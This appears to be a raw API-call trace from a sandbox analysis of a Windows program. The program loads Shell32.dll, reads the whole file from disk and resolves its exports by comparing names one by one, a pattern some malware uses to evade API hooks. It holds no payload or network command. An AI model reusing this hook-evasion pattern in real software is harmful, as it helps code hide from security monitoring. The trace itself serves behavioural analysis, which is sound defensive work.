(lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0257.993] GetProcessHeap () returned 0x4a0000 [0257.995] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4157040 | out: hHeap=0x4a0000) returned 1 [0258.005] GetProcessHeap () returned 0x4a0000 [0258.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9380 [0258.005] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0258.005] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0258.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0258.007] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0258.008] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0258.008] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0258.008] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0258.008] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0258.008] GetProcessHeap () returned 0x4a0000 [0258.008] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1587258) returned 0x4150040 [0258.249] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0258.250] ReadFile (in: hFile=0x140, lpBuffer=0x4150040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4150040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0261.873] CloseHandle (hObject=0x140) returned 1 [0261.875] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0261.876] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0261.876] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0261.876] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0261.876] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0261.876] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0261.876] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0261.876] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0261.876] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.876] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0261.876] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0261.876] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0261.876] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.876] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0261.876] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0261.877] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0261.877] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0261.877] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.877] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0261.877] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.877] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.877] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0261.877] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0261.877] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0261.877] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.877] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0261.878] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.878] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.878] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0261.878] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.878] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0261.879] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0261.880] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.881] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.882] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.883] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0261.884] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0261.884] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0261.884] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 